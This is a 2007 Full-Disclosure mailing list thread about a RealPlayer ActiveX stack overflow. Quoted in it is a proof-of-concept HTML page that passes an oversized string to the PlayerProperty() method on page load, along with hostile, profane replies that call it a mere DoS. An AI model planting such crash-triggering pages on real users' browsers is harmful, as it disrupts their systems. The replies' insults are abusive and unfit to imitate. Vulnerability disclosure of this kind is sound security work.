LOLOLOLOL ok you win, client side denial of service warrants your 5 electronic mail messages with up to the minute updates. I bet this one will be exploited in the wild!
Get a life LOLOL! J On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad <[EMAIL PROTECTED]> wrote: >"Stack Overflow" - learn to read. A DoS attack still has some >security implications... > >-----Original Message----- >>From: Joey Mengele <[EMAIL PROTECTED]> >>Sent: Nov 27, 2007 1:05 AM >>To: [email protected], [EMAIL PROTECTED] >>Subject: Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer >ierpplug.dll ActiveX Control Multiple Stack Overflows >> >>Holy mother of Hitler will you shut the fuck up already. This is >a >>"stack overflow" not a "stack based buffer overflow". There are >no >>security implications here. You are worse than Jewha Mati Laurio. > >> >>Elazar, please do not post to this list again. Please leave the >>trolling to the professionals. >> >>J >> >>P.S. Sorry for the swear words John. >> >>On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad >><[EMAIL PROTECTED]> wrote: >>>After some creative Googling, I am revising my original post. I >>>believe that the Import() method overflow that I originally >posted >>>is really http://www.securityfocus.com/bid/26130, although I am >>>not sure why Linux is listed under the "Vulnerable" section, so >I >>>am taking it out of the PoC code. Real claims to have patched >this >>>back in October, but I can still throw a stack overflow >exception >>>via this function using the originally stated version of >>>RealPlayer(which I installed last night). I am now listing this >>>vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX >>>Control PlayerProperty() Method Stack Overflow, and it might be >>>wise to list this under a separate BID. PoC as follows: >>> >>>------------- >>><!-- >>>written by e.b. >>>--> >>><html> >>> <head> >>> <script language="JavaScript" DEFER> >>> function Check() { >>> var s = "AAAA"; >>> >>> while (s.length < 999999) s=s+s; >>> >>> var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535- > >>>4070-4B92-A0EA-D9994BCC0DC5} >>> >>> var obj2 = obj.PlayerProperty(s); >>> >>> >>> } >>> </script> >>> >>> </head> >>> <body onload="JavaScript: return Check();"> >>> >>> </body> >>></html> >>>------------- >>> >>>Elazar >>> >>>_______________________________________________ >>>Full-Disclosure - We believe in it. >>>Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>>Hosted and sponsored by Secunia - http://secunia.com/ >> >>-- >>Click for your daily horoscope, learn about money, love & family. >>http://tagline.hushmail.com/fc/Ioyw6h4c4ZBHl2sHpyjNjTLgy4OTny6jhrF >rqMryjXVt31vg2H7tNd/ >> -- Click for your daily horoscope, learn about money, love & family. http://tagline.hushmail.com/fc/Ioyw6h4c4ZARVCeSZnQsflA3BGgTQlm8TvOc2Qh6Kh1tD32a9sgsa8/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
